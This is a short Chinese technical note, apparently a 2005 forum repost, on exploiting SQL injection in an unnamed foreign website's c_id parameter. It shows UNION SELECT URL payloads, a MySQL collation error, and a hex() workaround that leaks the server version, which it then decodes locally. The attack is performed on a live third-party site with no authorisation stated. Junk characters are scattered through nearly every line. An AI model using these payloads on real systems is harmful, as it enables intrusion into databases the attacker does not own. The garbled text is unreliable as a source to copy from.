本文作者:SuperHei
) C4 N$ q6 k9 K: `! ^文章性质:原创/ x2 K. N; l( Z. S" J/ Y
发布日期:2005-10-18
* ?! @. O' }1 x! k9 z0 y, t8 ~测试个国外的站时:
/ ?8 {/ R( B/ k# \. ?5 {url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
; Y! ~) C( u6 ~- ?: |- e' V返回错误:
3 }0 U# ^% N1 @6 K3 d5 eIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
/ W3 b/ q; o* j! ?, PMySQL Error No. 126 I. k: t3 t% g% r
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
, z! i. U/ A) `0 j! Z6 Z7 J( S解决办法:转为其他编码如hex。! t5 Q0 @; L/ u! E
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
, K1 `6 z. P! P& m成功得到hex(version())的值为:5 d9 A& }. `; t! F
342E312E332D62657461
% C& H! Z" W7 d9 Q/ `回Mysql查询下得到:* x% K& i0 J4 R5 F. N+ R p7 ?2 f
mysql> select 0x342E312E332D62657461;/ l ~* [* X. Y8 E) W1 q8 n# y1 u
+------------------------+
7 G& C: N2 {; D6 R+ i$ K| 0x342E312E332D62657461 |" O x' l( E0 P3 e ?! L- D1 P
+------------------------+: N( V* F) X/ V: U0 @7 Y2 d
| 4.1.3-beta |
: c3 L0 l; Y$ P0 g1 [) O- \+------------------------+
! u7 K5 j& L; @( x' g$ t1 row in set (0.00 sec)
5 q2 j7 \2 K' t) e# n5 e7 J6 q+ P/ V9 N; T/ t9 @0 Z& [: x
|